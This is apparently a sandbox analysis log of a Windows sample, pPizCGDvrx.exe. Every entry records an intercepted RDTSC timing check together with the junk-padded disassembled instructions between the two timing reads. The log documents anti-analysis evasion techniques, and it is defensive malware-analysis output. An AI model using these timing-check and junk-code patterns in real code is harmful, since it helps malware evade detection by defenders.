                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E04E9E second address: E04EC0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F2A2C619167h 0x00000008 pop edi 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E052DA second address: E052FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE35Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c jnp 00007F2A2CEBE356h 0x00000012 pop ecx 0x00000013 pop edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E052FD second address: E05301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E05301 second address: E05317 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F2A2CEBE35Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E05317 second address: E05331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2C619166h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0549E second address: E054AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F2A2CEBE35Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0573C second address: E05740 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E05740 second address: E0574C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0C3CE second address: E0C407 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2A2C619156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jg 00007F2A2C619156h 0x00000011 jg 00007F2A2C619156h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a je 00007F2A2C61915Eh 0x00000020 jc 00007F2A2C619156h 0x00000026 push esi 0x00000027 pop esi 0x00000028 popad 0x00000029 push ebx 0x0000002a jmp 00007F2A2C61915Bh 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0C407 second address: E0C41A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2CEBE35Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0C580 second address: E0C588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0C588 second address: E0C5AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F2A2CEBE36Eh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0C5AB second address: E0C5DF instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2A2C619168h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2A2C619166h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0C5DF second address: E0C5E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0C5E3 second address: E0C5E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0C5E7 second address: E0C5ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0C9D9 second address: E0C9DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0C9DD second address: E0C9F7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F2A2CEBE358h 0x0000000e pushad 0x0000000f popad 0x00000010 jnc 00007F2A2CEBE35Ah 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0C9F7 second address: E0CA01 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2A2C619162h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0CA01 second address: E0CA07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0CB6C second address: E0CB86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C61915Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F2A2C619156h 0x0000000f jg 00007F2A2C619156h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0CCF3 second address: E0CCFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0CCFC second address: E0CD2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jmp 00007F2A2C61915Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2A2C619168h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0CE65 second address: E0CE85 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2A2CEBE356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F2A2CEBE363h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0CFBF second address: E0CFC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0D476 second address: E0D4A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE363h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F2A2CEBE363h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0D4A6 second address: E0D4AC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0D4AC second address: E0D4B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0D4B6 second address: E0D4BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0D4BC second address: E0D4DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F2A2CEBE363h 0x0000000c jng 00007F2A2CEBE356h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0D973 second address: E0D97C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0D97C second address: E0D982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0D982 second address: E0D992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F2A2C619156h 0x0000000a popad 0x0000000b pop ecx 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E10263 second address: E10285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F2A2CEBE363h 0x0000000a popad 0x0000000b push edi 0x0000000c jbe 00007F2A2CEBE35Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0FDE6 second address: E0FDEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0FDEA second address: E0FDF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0FDF0 second address: E0FDF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0FDF6 second address: E0FE13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE369h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E0FF1F second address: E0FF37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2C61915Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E131FE second address: E13211 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b jl 00007F2A2CEBE356h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E12ACE second address: E12AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E12AD2 second address: E12AF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE366h 0x00000007 jnp 00007F2A2CEBE356h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E12AF2 second address: E12AF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E12AF8 second address: E12AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E12C90 second address: E12CA7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F2A2C61915Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E12CA7 second address: E12CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2A2CEBE356h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E12CB1 second address: E12CB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E16F3A second address: E16F75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE368h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F2A2CEBE35Ah 0x00000011 jmp 00007F2A2CEBE363h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D7F884 second address: D7F889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D7F889 second address: D7F88E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D7F88E second address: D7F89F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2A2C619156h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D7F89F second address: D7F8A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E169AF second address: E169B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E169B5 second address: E169BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E169BE second address: E169C8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2A2C619156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E169C8 second address: E169E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F2A2CEBE35Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E169E0 second address: E169E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E16C70 second address: E16C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F2A2CEBE356h 0x0000000a jmp 00007F2A2CEBE35Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D82DC1 second address: D82DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D82DC5 second address: D82DE0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 js 00007F2A2CEBE356h 0x0000000f js 00007F2A2CEBE356h 0x00000015 pop ecx 0x00000016 push edi 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: D82DE0 second address: D82DFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2A2C619163h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E1A3A4 second address: E1A3B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2A2CEBE35Ah 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E1A3B9 second address: E1A3BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E1A3BD second address: E1A3C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E1A3C1 second address: E1A3C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E20653 second address: E20657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E20657 second address: E20662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E20662 second address: E20685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F2A2CEBE369h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E1F258 second address: E1F25E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E1F3BC second address: E1F3D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE35Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F2A2CEBE356h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E1F3D7 second address: E1F3E7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2A2C619156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E1F3E7 second address: E1F42D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2A2CEBE356h 0x00000008 jmp 00007F2A2CEBE365h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 jmp 00007F2A2CEBE368h 0x00000018 push edi 0x00000019 pop edi 0x0000001a pop esi 0x0000001b push eax 0x0000001c jns 00007F2A2CEBE356h 0x00000022 pop eax 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E1F42D second address: E1F433 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E1F69F second address: E1F6BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE365h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E1F6BB second address: E1F6CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F2A2C619156h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC6384 second address: DC638E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2A2CEBE356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: DC638E second address: DC63C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F2A2C619169h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 jmp 00007F2A2C619161h 0x00000016 pop eax 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E1F831 second address: E1F837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E1F837 second address: E1F83D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E28953 second address: E28959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E28959 second address: E28969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 jc 00007F2A2C619156h 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E28969 second address: E2896E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E2896E second address: E2897D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F2A2C619156h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E280B4 second address: E280F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE35Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F2A2CEBE356h 0x00000010 jng 00007F2A2CEBE356h 0x00000016 ja 00007F2A2CEBE356h 0x0000001c popad 0x0000001d jc 00007F2A2CEBE38Bh 0x00000023 jmp 00007F2A2CEBE361h 0x00000028 push eax 0x00000029 push edx 0x0000002a push ebx 0x0000002b pop ebx 0x0000002c push esi 0x0000002d pop esi 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E283FB second address: E283FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E283FF second address: E2840F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2A2CEBE356h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E2840F second address: E28424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A2C619161h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E28424 second address: E28428 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E322BB second address: E322C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jp 00007F2A2C619156h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E313BF second address: E313C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E31555 second address: E31559 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E31559 second address: E31569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jns 00007F2A2CEBE356h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: E31968 second address: E3196C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
